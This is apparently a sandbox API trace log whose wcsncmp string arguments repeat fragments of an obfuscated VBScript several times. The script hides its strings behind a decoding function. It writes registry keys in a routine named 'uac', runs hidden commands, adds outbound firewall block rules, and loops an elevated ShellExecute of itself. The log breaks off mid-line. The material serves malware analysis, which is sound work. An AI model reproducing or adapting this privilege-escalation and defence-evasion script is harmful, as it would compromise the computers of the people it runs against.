bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.339] wcsncmp (_String1="es\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.339] wcsncmp (_String1="s\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.340] wcsncmp (_String1="\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0226.340] wcsncmp (_String1="\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.340] wcsncmp (_String1="Set rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add 